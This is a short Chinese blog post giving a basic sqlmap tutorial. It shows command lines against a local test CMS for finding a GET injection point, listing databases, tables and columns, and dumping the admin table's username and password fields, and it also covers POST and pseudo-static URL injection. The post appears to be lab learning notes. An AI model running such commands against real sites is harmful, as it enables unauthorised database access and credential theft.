sqlmap简单使用

get型

判断注入点

python sqlmap.py -u http://127.0.0.1/jdy/typeid.php?typeid=1

 

 

 

1、 获取当前数据库

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" --current-db --dbms mysql

 

 

 

2、 获取表

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" --dbms mysql --batch --tables

 

 

 

3、 获取指定表中字段名

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" --columns

 

 

 

4、 获取字段内容

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" -C "username,password" --dump

 

 

 

post型; 将所拦截的包保存到本地

python sqlmap.py -r C:\Users\gyf\Desktop\post.txt -p "id"

 

 

 

 

 

伪静态页面注入

python sqlmap.py -u http://127.0.0.1/weijingtai/1*.html

 

 

posted @ 2019-10-30 20:20  balalal  阅读(184)  评论(0编辑  收藏  举报